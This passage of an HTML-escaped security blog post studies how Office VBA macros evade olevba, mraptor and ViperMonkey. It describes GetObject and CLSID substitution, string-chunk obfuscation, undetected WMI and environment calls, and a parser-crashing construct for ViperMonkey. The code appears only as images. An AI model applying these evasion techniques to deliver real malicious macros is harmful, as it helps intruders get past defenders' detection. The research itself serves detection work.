        src=&quot;/website/static/4ffa0be8c9261ad36303d583be72b86a/4d08a/AdvancedVBAmacros7.png&quot;
        srcset=&quot;/website/static/4ffa0be8c9261ad36303d583be72b86a/804b2/AdvancedVBAmacros7.png 384w,
/website/static/4ffa0be8c9261ad36303d583be72b86a/4d08a/AdvancedVBAmacros7.png 709w&quot;
        sizes=&quot;(max-width: 709px) 100vw, 709px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;olevba result:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 710px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/bd74e2d9698cf7489466f9c518a5ced6/7131f/AdvancedVBAmacros8.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 184.11458333333331%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAlCAIAAADNzV5SAAAACXBIWXMAAAsTAAALEwEAmpwYAAADo0lEQVR42o2W6XLbMAyE9f7Pl9jp+GgyY10kdduS+6/fArLqNOlMkYShKAJYYAHY2TRdkWkcJ9tNDxnH8Woy/UNut1vWtm3TNOy6rmPvJpBhGHjkcBiH63cyz3MWU4oxsmMtyxKHt/k2L3Pfd1VVV3WNhdt3ImU8GOzJjTlgiQFDNuTPG/m4GuyqrPq+B2JdBzZulU1KTUrJ42qaNsXkgcSYsC3PvC7KgjWEWNd13w+uTAIAHULgVU0AIZZFSYyYITpML8uS8VBVVYyB8IZxJFrHj4cQo7sNEily2IHIIEgZ9Pc7G+7P/GfPBufjOFzyPKITBQpX4Aq1BM/YQEWwAUWquYd9jx9jSgFKEtHhW9LnKVypAlVtgSXF07KCRQmzxJCyRtBb2UjpU7YpEiWsKEMd8H+93u73+5ow8xzMI8qgNf9cDPjILzn6itkjlsasbLnyOAxGgchrjDPWYPaIyFMjnp1MVid582wZ1qu4IogOnpWbznPjCSOXnVXiRhXneOM+PEdTbsXU4BalbFQZV/zY6s45Jxdbqr3CtsvGLI0R4uVyoU5UQDEWRUG181YVpixalRmLLhyo5kIg7WoMb4TBGtjbGKvDsMKLTqKxyD/8gxxzXBDPVDk4J8uzx8zKOyOp8VzBtoEnBVLzFsr4e+5vD4cVqlAjP79MCJV1WZbtgmrbsHU8C1nXeRuCjz/MW2HjWXfYG7Dbxoh47oeBGklqgURtkzOvau/eZN2shm/bbyaJP3g8wWrQy2C9svIye7dteVl59mfAMuuIbn7UqWbZk+YW6naYed1AvGAHeYZAH0MiuQ6GKNUryRWrZ2WdJASDf2/KzpLvPDt+Tjl0sUFCiqBiWGeYFxDzgdUnG7HyWn40NyqvuWf8a8K8S+RVS+OnRIcC5oq8ANpfmp94Rk29SjBtCyRjSCC3NvTQWMBtxDU2fccMVOfT+XQ6HQ7H8/nn+/vH8XDk93A47HZvu9fdfv/29vbj5WX3+vK63++Px9P7x8fpdJaywyZJmv7reNR8pFq0FEWe54VWImDAF5dLXqqQNLoz73JR5cFbDVLGEEbC0GDzqO37syhmlSefj9Y9olXzTZWNISvV8jGB0sac9nUgO1lhor5dh7M1rd1QANU6Qv3DaJth7NXPXsOAaDU61BHk2luyLCqzXIKfkFFztH9g90+jZPtOwCeuJsv46auAnY+2magxDX2vO//s/fpRvH1ReN77o5S/Vs9/yrIsvwGqJhuCSmduOQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros8&quot;
        title=&quot;&quot;
        src=&quot;/website/static/bd74e2d9698cf7489466f9c518a5ced6/7131f/AdvancedVBAmacros8.png&quot;
        srcset=&quot;/website/static/bd74e2d9698cf7489466f9c518a5ced6/804b2/AdvancedVBAmacros8.png 384w,
/website/static/bd74e2d9698cf7489466f9c518a5ced6/7131f/AdvancedVBAmacros8.png 710w&quot;
        sizes=&quot;(max-width: 710px) 100vw, 710px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;4.Observations&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;We have observed that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Some useful functions to obfuscate our macro are used to detect it. Ex: &lt;a href=&quot;https://github.com/outflanknl/EvilClippy&quot;&gt;Evilclippy&lt;/a&gt; tricks like VBA stomping/pcode obfuscation are currently detected by olevba.&lt;/li&gt;
&lt;li&gt;There is no known way to obfuscate Sub Events, like &lt;a href=&quot;https://support.microsoft.com/en-us/office/automate-startup-events-with-a-macro-b08d4f22-b517-4ccf-bd14-8670416628b0&quot;&gt;AutoExec&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;There is no known way to obfuscate functions and methods.&lt;/li&gt;
&lt;li&gt;There are many examples of APT macros that prefer to leave the macro in plain text rather than obfuscate it through a well known technique or suspicious functions.&lt;/li&gt;
&lt;li&gt;Spotting Win32 Windows API through the &lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/declare-statement#example&quot;&gt;Lib Declare Statement&lt;/a&gt; is trivial and in some contexts blue teams are beginning to  &lt;a href=&quot;https://learn.microsoft.com/it-it/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide#block-win32-api-calls-from-office-macros&quot;&gt;block them through ASR&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;We also identified the following technical details related to the detection of the examined tools :
&lt;ul&gt;
&lt;li&gt;Obfuscation performed through the &lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/mid-function&quot;&gt;Mid&lt;/a&gt; and the &lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/array-function&quot;&gt;Array&lt;/a&gt; functions is not detected by the examined tools. There are plenty of ways to obfuscate the code and it does not seem worth detecting them all through a static approach.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/api/wbemcli/nf-wbemcli-iwbemservices-execquery&quot;&gt;ExecQuery&lt;/a&gt; and other dangerous &lt;a href=&quot;https://en.wikipedia.org/wiki/Windows_Management_Instrumentation&quot;&gt;WMI&lt;/a&gt; methods to perform code execution like Create are not detected by the examined tools.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/windows-scripting/dy8116cf%28v%3dvs.84%29&quot;&gt;ExpandEnvironmentStrings&lt;/a&gt; method of WScript.Shell Object is an &lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/environ-function&quot;&gt;Environ&lt;/a&gt; alternative to retrieve environment variables which not trigger by the examined tools.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 663px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/3caa095da4b1ebfb23d1963081967aae/0786c/AdvancedVBAmacros9.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 19.53125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAhklEQVR42nWNyQ7DIAxE+f9vTChIZQuEHUxuNeHCpU8WM8IemyiljLlu75211lxCyBCjc/Y7kdoYKaXWWqlZOeeYEk7iWG+dUEpPSjnjQgjOUafBHGfsOE7vfdqoL7gihAAAhH0YHscGfuFbSl7Uiq601vrLkrYxw88zEIDZgyWb+QeGxxg/W1TgIAzNEAQAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros9&quot;
        title=&quot;&quot;
        src=&quot;/website/static/3caa095da4b1ebfb23d1963081967aae/0786c/AdvancedVBAmacros9.png&quot;
        srcset=&quot;/website/static/3caa095da4b1ebfb23d1963081967aae/804b2/AdvancedVBAmacros9.png 384w,
/website/static/3caa095da4b1ebfb23d1963081967aae/0786c/AdvancedVBAmacros9.png 663w&quot;
        sizes=&quot;(max-width: 663px) 100vw, 663px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Other undetected alternatives could be:
&lt;ul&gt;
&lt;li&gt;Using &lt;a href=&quot;https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/windows-scripting/6s7w15a0(v=vs.84)&quot;&gt;Environment&lt;/a&gt; Wscript.Shell method&lt;/li&gt;
&lt;li&gt;Calling an ExecQuery on &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-environment&quot;&gt;Win32_Environment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Querying directly inside HKCU\Environment&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;In the common implementations of these tools some hits are systematically discarded to avoid false positives. Hex string detection in olevba is an example.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However, in well-managed infrastructures, &lt;em&gt;&lt;strong&gt;it is possible to research some mandatory subroutines, methods and functions to systematically detect macros through a static approach, and to engaging an analyst&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;5.Tests carried out&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Starting from these osservations we have tried to build at least one PoC that performs 0 hits on olevba and a &quot;macro ok&quot; result in mraptor.&lt;/p&gt;
&lt;p&gt;These are three minimum requirements for getting a foothold through a VBA macro:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;An Autoexec Sub Event to trigger our macro&lt;/li&gt;
&lt;li&gt;A code execution method/function&lt;/li&gt;
&lt;li&gt;Except for some trivial cases, you will normally need at least a COM/OLE/ActiveX Object, so you need to call at least one function like &lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/createobject-function&quot;&gt;CreateObject&lt;/a&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;strong&gt;Bypassing CreateObject detection&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Even if performing alerting only on CreateObject is pretty impossible due to FP, it is possible to avoid this hit in some scenarios through  &lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/getobject-function&quot;&gt;GetObject&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;At the time of writing, GetObject is not reported as a suspicious function by olevba.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 712px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/6e12145fd0ea84a69c0cf8f5250b5a9e/3d4b6/AdvancedVBAmacros10.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 8.072916666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAVklEQVR42j1MyREAMQhK/5XGA00HrObYByMgMBDBKIjIvm7+88ykmW3tAFWVpkZ3HFR2zkkpHzgbo0sZWQHnWqseoF3+tN5CZ3o4y4/uFO+xzvcOHPwAoHCWrD9bCVcAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros10&quot;
        title=&quot;&quot;
        src=&quot;/website/static/6e12145fd0ea84a69c0cf8f5250b5a9e/3d4b6/AdvancedVBAmacros10.png&quot;
        srcset=&quot;/website/static/6e12145fd0ea84a69c0cf8f5250b5a9e/804b2/AdvancedVBAmacros10.png 384w,
/website/static/6e12145fd0ea84a69c0cf8f5250b5a9e/3d4b6/AdvancedVBAmacros10.png 712w&quot;
        sizes=&quot;(max-width: 712px) 100vw, 712px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Some automation servers have a running instance by default. Using one of these objects, it is possible to use GetObject, avoiding the call to CreateObject at all. See: &lt;a href=&quot;https://learn.microsoft.com/en-us/office/troubleshoot/office-suite-issues/getobject-createobject-behavior&quot;&gt;differences between GetObject and CreateObject&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;For these tests we decided to start with one of the most common objects with a default instance: &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/shell/shell-application&quot;&gt;Shell.Application&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Crafting our easy custom undetected obfuscation&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;After a first look we decided to use the &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/com/clsid-key-hklm&quot;&gt;CLSID&lt;/a&gt; avoid Shell.Application pattern match detection.&lt;/p&gt;
&lt;p&gt;Here is how to easily get Shell.Application CLSID through powershell:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 709px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/9a9cd43df3ba01c1bd3063046962c502/4d08a/AdvancedVBAmacros11.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 11.458333333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAVElEQVR42i2MSwoAIQxDvf8ttV9bEKzoeqrMI1BC0hQzQyQAIMJaK9JPu0Aq6dpFNAFo5q6i+bX3Lnn4JcyMiG6eTp6V275rmY4xImLOudaKxznnA72ZbPzTebSsAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros11&quot;
        title=&quot;&quot;
        src=&quot;/website/static/9a9cd43df3ba01c1bd3063046962c502/4d08a/AdvancedVBAmacros11.png&quot;
        srcset=&quot;/website/static/9a9cd43df3ba01c1bd3063046962c502/804b2/AdvancedVBAmacros11.png 384w,
/website/static/9a9cd43df3ba01c1bd3063046962c502/4d08a/AdvancedVBAmacros11.png 709w&quot;
        sizes=&quot;(max-width: 709px) 100vw, 709px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;So instead of:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 710px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/71e720b7c79c68bbb0bdcbe9a5cf00db/7131f/AdvancedVBAmacros12.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 7.8125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAQ0lEQVR42o3MMQ7AIAwEQf7/0di+AwlLTnuBFElLsdpumpkJgK51kgoPRfzNmbqrVIc1X1Af40XZKXf/MIDKzGNsgw8TwJia4QI2awAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros12&quot;
        title=&quot;&quot;
        src=&quot;/website/static/71e720b7c79c68bbb0bdcbe9a5cf00db/7131f/AdvancedVBAmacros12.png&quot;
        srcset=&quot;/website/static/71e720b7c79c68bbb0bdcbe9a5cf00db/804b2/AdvancedVBAmacros12.png 384w,
/website/static/71e720b7c79c68bbb0bdcbe9a5cf00db/7131f/AdvancedVBAmacros12.png 710w&quot;
        sizes=&quot;(max-width: 710px) 100vw, 710px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;We used:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 710px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/a35f327b5bd2dd93d384ab4a2fa0777f/7131f/AdvancedVBAmacros13.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 8.072916666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAAsTAAALEwEAmpwYAAAATElEQVR42k2MwQ7AIAxC/f//1Cq0izusXkd6ksNLIZRGOslwBzDGAOQqItdaopnNOXvvEZGZ36Xm7kpZVLvsI+jQjtcoAf3v/Z6Tt35ibG9UWa6iwgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros13&quot;
        title=&quot;&quot;
        src=&quot;/website/static/a35f327b5bd2dd93d384ab4a2fa0777f/7131f/AdvancedVBAmacros13.png&quot;
        srcset=&quot;/website/static/a35f327b5bd2dd93d384ab4a2fa0777f/804b2/AdvancedVBAmacros13.png 384w,
/website/static/a35f327b5bd2dd93d384ab4a2fa0777f/7131f/AdvancedVBAmacros13.png 710w&quot;
        sizes=&quot;(max-width: 710px) 100vw, 710px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;However the string was detected in a heuristic way by exchanging the CLSID with a hex string.&lt;/p&gt;
&lt;p&gt;As mentioned above, it is a olevba hit that makes tons of FPs like this.&lt;/p&gt;
&lt;p&gt;Despite this fact, we still tried to obfuscate this string creating our own obfuscation technique. It would also come in handy later to obfuscate our exploit.&lt;/p&gt;
&lt;p&gt;After some research we discovered that adding chunks of strings to a variable containing an empty string prevents olevba from detecting and deobfuscating the string:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 707px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/8280950b8cf0530a393bb925eccee470/394f7/AdvancedVBAmacros14.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 14.583333333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAZElEQVR42k2MSRKAMAgE8/9vyiIQvYQUV8eoVfaBaoalncc5Rs458y4v+TWZ4x8+OSpOqqoRkZtvgEhEmRhqZghFhJkhuzkEYV/4Ai9aRNxq7ktUVHXHRkRXkXfqgY/Re/6oqgsLeab/Pn6lewAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros14&quot;
        title=&quot;&quot;
        src=&quot;/website/static/8280950b8cf0530a393bb925eccee470/394f7/AdvancedVBAmacros14.png&quot;
        srcset=&quot;/website/static/8280950b8cf0530a393bb925eccee470/804b2/AdvancedVBAmacros14.png 384w,
/website/static/8280950b8cf0530a393bb925eccee470/394f7/AdvancedVBAmacros14.png 707w&quot;
        sizes=&quot;(max-width: 707px) 100vw, 707px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Note: without using a variable olevba detects the technique&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Killing ViperMonkey&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;After a quick test, we realized that &lt;a href=&quot;https://github.com/decalage2/ViperMonkey&quot;&gt;ViperMonkey&lt;/a&gt; is able to decode our obfuscation method.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 710px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/75802766c37b6b6d24774a8ec86629fd/7131f/AdvancedVBAmacros15.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 14.583333333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAcUlEQVR42jWOSQ7FIAxDuf8hW5GSkWFVWNe0/z9LxjJKIEVULqxqY4xamwqkKN3MPdz3iV5EUMKF+Q3aW0/Mch7gJKKcCSFvEA6iq0BXUVXeUz9EDdZ7T7GpNaK1Zmb4Ala64UHDNcr7Zc75+Vpr/nkAHAmj1v0vTgkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros15&quot;
        title=&quot;&quot;
        src=&quot;/website/static/75802766c37b6b6d24774a8ec86629fd/7131f/AdvancedVBAmacros15.png&quot;
        srcset=&quot;/website/static/75802766c37b6b6d24774a8ec86629fd/804b2/AdvancedVBAmacros15.png 384w,
/website/static/75802766c37b6b6d24774a8ec86629fd/7131f/AdvancedVBAmacros15.png 710w&quot;
        sizes=&quot;(max-width: 710px) 100vw, 710px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Despite being a big project, ViperMonkey is a experimental emulator, developers who integrate it into their platform are used to handling &lt;em&gt;&lt;strong&gt;considerable number of crashes with legitimate macros, ergo seeing a ViperMonkey crash is not suspicious at all&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;To crash vmonkey you need to find some VBA code accepted by our office program that crashes the vmonkey parser.&lt;/p&gt;
&lt;p&gt;After some fuzzing we have identified the following simple code:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 711px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/d4ef20248772279308b269e8857cef9b/a8e5b/AdvancedVBAmacros16.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 38.28125000000001%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAvklEQVR42o2RUQ+DIAyE9///pagUSkHAqq87MFk2s8zdQ7mQfOVKH5aIPZOFiDls/0lV931/GDNOTXPOZV31OI696zQ/+Aaz90CNMWTJe++cjynFGJ1zOedbmMdx6qkppbQsSykFmIiUWm/gYTAhSBQJIYABXGs9us78F+ADRjwMjLQwzEzkJEbddO1CI/wNTC+oeoXxZyKYtI2KA5PjRBAkn6cZ92h63sO/Hm+wnS2iwmlr28um5zbeN/N1VU8wK8Ob+tf8fwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros16&quot;
        title=&quot;&quot;
        src=&quot;/website/static/d4ef20248772279308b269e8857cef9b/a8e5b/AdvancedVBAmacros16.png&quot;
        srcset=&quot;/website/static/d4ef20248772279308b269e8857cef9b/804b2/AdvancedVBAmacros16.png 384w,
/website/static/d4ef20248772279308b269e8857cef9b/a8e5b/AdvancedVBAmacros16.png 711w&quot;
        sizes=&quot;(max-width: 711px) 100vw, 711px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;A declaration of a function with at least one argument inside an if statement will do the job. Microsoft Word will successfully run the macro:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;/website/d8bbf1cc4de813d2d08c12bd909245e5/AdvancedVBAmacros17.gif&quot; alt=&quot;AdvancedVBAmacros17&quot;&gt;&lt;/p&gt;
&lt;p&gt;The vmonkey parser will fail:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 838px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/6b19c57b298a1342f3909c5b92d360e8/a1dd2/AdvancedVBAmacros18.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
